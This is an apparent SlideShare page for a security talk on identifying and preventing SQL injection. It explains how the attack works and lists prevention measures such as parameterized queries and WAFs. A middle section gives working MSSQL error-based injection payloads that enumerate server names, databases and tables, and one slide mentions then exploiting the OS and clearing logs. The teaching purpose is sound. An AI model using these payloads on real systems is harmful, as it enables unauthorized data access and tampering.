Eguardian Global Services, profile picture
Uploaded byEguardian Global Services
645 views

How to identify and prevent SQL injection

The document discusses SQL injection (SQLi) as a major web application vulnerability that can compromise sensitive data and lead to unauthorized access. It outlines notable SQLi incidents and explains how attackers manipulate SQL queries to extract, modify, or delete data. Prevention strategies include using parameterized queries, validating user input, and employing web application firewalls and intrusion prevention systems.

Embed presentation

How to Identify and Prevent SQL Injection
#Whoami Janith Malinga Security Consultant @egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
Why web applications need security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
Web Application Vulnerabilities OWASP Top 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
SQL Injection (SQLi)
What is SQLi SQLi is a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
Well known SQLi Attacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
Well known SQLi Attacks SQLi Malwares • Asprox • Lizamoon
Understand how web applications work Client Computer Application Server Database Server
Understand how web applications work Client Computer Application Server Database Server Request /home.php Response /home.php
Understand how web applications work Student search ID: Search https://www.abcd.com/student
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student?id=123
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
Understanding SQLi Recall: what is SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
Understanding SQLi Now let’s manipulate the input so that the database will be confused ☺
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
MySQL error
MSSQL error
Understanding SQLi DEMO
What SQLi can do • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
Sample SQL Injection Attack
Web login form First we sent the input ‘ character Member login Username: Password: Login
Output – page is vulnerable to sql injection
Payload: a’ and 1=0/@@version;-- Find database version
Payload: a' and 1=0/(select @@servername);-- Find server name
Payload: a' and 1=0/(select db_name());-- Find database name
Payload: a' and 1=0/(select top 1 name from master..sysdatabases);-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
Next steps • Getting all the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
How to Prevent SQL Injection
Prevent SQL Injection 1. Code level prevention 2. Platform level prevention
Prevent SQL Injection Code level prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
Prevent SQL Injection Good practice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
Prevent SQL Injection Code level prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
Prevent SQL Injection Code level prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
Prevent SQL Injection Platform level prevention - Web application firewall (WAF)
Prevent SQL Injection Platform level prevention - IPS
Prevent SQL Injection Platform level prevention – Log collection and Monitoring
Q&A !!!
How to identify and prevent SQL injection

More Related Content

PPTX
Sql injection
byZidh
 
PPTX
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
PDF
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
PPT
Sql injection
byNikunj Dhameliya
 
PPTX
Sql Injection attacks and prevention
byhelloanand
 
PPTX
SQL Injections (Part 1)
byn|u - The Open Security Community
 
PPTX
Sql injections - with example
byPrateek Chauhan
 
PPTX
Sql injection - security testing
byNapendra Singh
 
Sql injection
byZidh
 
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
Sql injection
byNikunj Dhameliya
 
Sql Injection attacks and prevention
byhelloanand
 
SQL Injections (Part 1)
byn|u - The Open Security Community
 
Sql injections - with example
byPrateek Chauhan
 
Sql injection - security testing
byNapendra Singh
 

What's hot

PPT
SQL Injection
byAdhoura Academy
 
PPT
A Brief Introduction in SQL Injection
bySina Manavi
 
PPT
Sql injection attack
byRajKumar Rampelli
 
PPTX
Sql injection in cybersecurity
bySanad Bhowmik
 
PPT
Sql injection
byPallavi Biswas
 
PPTX
Ppt on sql injection
byashish20012
 
PPT
Sql injection
byNitish Kumar
 
PPT
Hacking web applications
byAdeel Javaid
 
PPTX
A2 - broken authentication and session management(OWASP thailand chapter Apri...
byNoppadol Songsakaew
 
PPTX
SQL Injection attack
byRayudu Babu
 
PPTX
SQL injection prevention techniques
bySongchaiDuangpan
 
PPTX
seminar report on Sql injection
byJawhar Ali
 
PPTX
SQL INJECTION
byMentorcs
 
PDF
CSRF Basics
byn|u - The Open Security Community
 
PPTX
Reflective and Stored XSS- Cross Site Scripting
byInMobi Technology
 
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
PPTX
SQL Injection
byAsish Kumar Rath
 
PPTX
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
PPTX
Vulnerability and Assessment Penetration Testing
byYvonne Marambanyika
 
PPTX
Cross Site Scripting
byAli Mattash
 
SQL Injection
byAdhoura Academy
 
A Brief Introduction in SQL Injection
bySina Manavi
 
Sql injection attack
byRajKumar Rampelli
 
Sql injection in cybersecurity
bySanad Bhowmik
 
Sql injection
byPallavi Biswas
 
Ppt on sql injection
byashish20012
 
Sql injection
byNitish Kumar
 
Hacking web applications
byAdeel Javaid
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
byNoppadol Songsakaew
 
SQL Injection attack
byRayudu Babu
 
SQL injection prevention techniques
bySongchaiDuangpan
 
seminar report on Sql injection
byJawhar Ali
 
SQL INJECTION
byMentorcs
 
CSRF Basics
byn|u - The Open Security Community
 
Reflective and Stored XSS- Cross Site Scripting
byInMobi Technology
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
SQL Injection
byAsish Kumar Rath
 
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
Vulnerability and Assessment Penetration Testing
byYvonne Marambanyika
 
Cross Site Scripting
byAli Mattash
 

Similar to How to identify and prevent SQL injection

PPTX
SQLi for Security Champions
byPetraVukmirovic
 
PPTX
Sql injection
byMehul Boghra
 
PPTX
Understanding and preventing sql injection attacks
byKevin Kline
 
PDF
Ijcatr04041018
byEditor IJCATR
 
PPT
D:\Technical\Ppt\Sql Injection
byavishkarm
 
PPSX
Web application security
bywww.netgains.org
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PDF
Protect Your Database_ SQL Injection Attack Prevention.pdf
bySachin FromDev
 
PDF
SQLi Tutorial | SQL Injection - Tpoint Tech
byHimani415946
 
PPTX
SQL Injection Introduction and Prevention
byMohammed Fazuluddin
 
PDF
Chapter 14 sql injection
bynewbie2019
 
PDF
Sql injection
byGauthamMK
 
PPTX
Sql injection
bySuraj Tiwari
 
PPTX
SQL Injection: Unraveling the Threats
byInsecureLab
 
PPTX
Sql injection
byUzair ul Haq Khan
 
PPTX
Sql Injection
byAju Thomas
 
PPTX
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
byprasadGade6
 
PDF
Sql injection
bySafwan Hashmi
 
PPTX
SQL INJECTION
byAnoop T
 
PDF
Sql injection bypassing hand book blackrose
byNoaman Aziz
 
SQLi for Security Champions
byPetraVukmirovic
 
Sql injection
byMehul Boghra
 
Understanding and preventing sql injection attacks
byKevin Kline
 
Ijcatr04041018
byEditor IJCATR
 
D:\Technical\Ppt\Sql Injection
byavishkarm
 
Web application security
bywww.netgains.org
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
Protect Your Database_ SQL Injection Attack Prevention.pdf
bySachin FromDev
 
SQLi Tutorial | SQL Injection - Tpoint Tech
byHimani415946
 
SQL Injection Introduction and Prevention
byMohammed Fazuluddin
 
Chapter 14 sql injection
bynewbie2019
 
Sql injection
byGauthamMK
 
Sql injection
bySuraj Tiwari
 
SQL Injection: Unraveling the Threats
byInsecureLab
 
Sql injection
byUzair ul Haq Khan
 
Sql Injection
byAju Thomas
 
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
byprasadGade6
 
Sql injection
bySafwan Hashmi
 
SQL INJECTION
byAnoop T
 
Sql injection bypassing hand book blackrose
byNoaman Aziz
 

Recently uploaded

PDF
Pneumatic Pressure Pump PPP01 for Calibration & Testing
bySERRAX TECHNOLOGIES LLP
 
PDF
Adapt.com Seed Fundraising Deck | The AI Computer for Business
byashley459565
 
PDF
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
PPTX
Jisc Equipment Data Service Update Workshop 3 December 2025
byJisc
 
PPTX
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
PDF
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
PDF
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
PPTX
Software Engineering in the Age of AI Agents
byHusseinMalikMammadli
 
PDF
How PayPal Account Verification Works – Complete Guide for Online Businesses
byjhdhj3989
 
PDF
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
PDF
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
PDF
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
PDF
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
PDF
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
PDF
Computer-Based Training (CBT) The Backbone of Modern Technical & Defence Trai...
bycomputerbasedtrainin1
 
PPTX
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
PDF
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
PDF
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
PDF
Real-Time AI at Scale Masterclass: Feature Store at Scale
byScyllaDB
 
PDF
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 
Pneumatic Pressure Pump PPP01 for Calibration & Testing
bySERRAX TECHNOLOGIES LLP
 
Adapt.com Seed Fundraising Deck | The AI Computer for Business
byashley459565
 
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
Jisc Equipment Data Service Update Workshop 3 December 2025
byJisc
 
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
Why AI Girlfriends Are the Future of Digital Companionship
byAi Angels
 
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
Software Engineering in the Age of AI Agents
byHusseinMalikMammadli
 
How PayPal Account Verification Works – Complete Guide for Online Businesses
byjhdhj3989
 
Transcript: What Thema can do: Leveraging metadata to support the discoverabi...
byBookNet Canada
 
ICT500 - CRITICAL AND CREATIVE THINKING FOR INFORMATION TECHNOLOGY SOLUTIONS:...
by2024432452
 
"When every team does things "right", but together it turns into chaos", Yozh...
byFwdays
 
Build Next-Gen Spatial & Sensor Workflows: Secure, Scalable Processing in Sno...
bySafe Software
 
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
Computer-Based Training (CBT) The Backbone of Modern Technical & Defence Trai...
bycomputerbasedtrainin1
 
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
Fortinet Certified Fundamentals in Cybersecurity
byVICTOR MAESTRE RAMIREZ
 
Chapter 3 Cryptography and encryption techniques.pdf
byGetnet Tigabie Askale -(GM)
 
Real-Time AI at Scale Masterclass: Feature Store at Scale
byScyllaDB
 
Dev Dives: Build and deploy agentic automations - the unified way
byUiPathCommunity
 

How to identify and prevent SQL injection

  • 1.
    How to Identifyand Prevent SQL Injection
  • 2.
    #Whoami Janith Malinga Security Consultant@egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
  • 3.
    Why web applicationsneed security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
  • 4.
    Web Application Vulnerabilities OWASPTop 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
  • 5.
  • 6.
    What is SQLi SQLiis a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
  • 7.
    Well known SQLiAttacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
  • 8.
    Well known SQLiAttacks SQLi Malwares • Asprox • Lizamoon
  • 9.
    Understand how webapplications work Client Computer Application Server Database Server
  • 10.
    Understand how webapplications work Client Computer Application Server Database Server Request /home.php Response /home.php
  • 11.
    Understand how webapplications work Student search ID: Search https://www.abcd.com/student
  • 12.
    Understand how webapplications work Student search 123ID: Search https://www.abcd.com/student?id=123
  • 13.
    Understand how webapplications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
  • 14.
    Understand how webapplications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
  • 15.
    Understanding SQLi Recall: whatis SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
  • 16.
    Understanding SQLi Now let’smanipulate the input so that the database will be confused ☺
  • 17.
    Understand how webapplications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
  • 18.
    Understand how webapplications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
  • 19.
    Understand how webapplications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
  • 20.
  • 21.
  • 22.
  • 23.
    What SQLi cando • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
  • 24.
  • 25.
    Web login form Firstwe sent the input ‘ character Member login Username: Password: Login
  • 26.
    Output – pageis vulnerable to sql injection
  • 27.
    Payload: a’ and1=0/@@version;-- Find database version
  • 28.
    Payload: a' and1=0/(select @@servername);-- Find server name
  • 29.
    Payload: a' and1=0/(select db_name());-- Find database name
  • 30.
    Payload: a' and1=0/(select top 1 name from master..sysdatabases);-- Find all databases
  • 31.
    Payload: a' and1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
  • 32.
    Payload: a' and1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
  • 33.
    Payload: a' and1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
  • 34.
    Payload: a' and1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
  • 35.
    Payload: a' and1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
  • 36.
    Next steps • Gettingall the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
  • 37.
    How to PreventSQL Injection
  • 38.
    Prevent SQL Injection 1.Code level prevention 2. Platform level prevention
  • 39.
    Prevent SQL Injection Codelevel prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
  • 40.
    Prevent SQL Injection Goodpractice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
  • 41.
    Prevent SQL Injection Codelevel prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
  • 42.
    Prevent SQL Injection Codelevel prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
  • 43.
    Prevent SQL Injection Platformlevel prevention - Web application firewall (WAF)
  • 44.
    Prevent SQL Injection Platformlevel prevention - IPS
  • 45.
    Prevent SQL Injection Platformlevel prevention – Log collection and Monitoring
  • 46.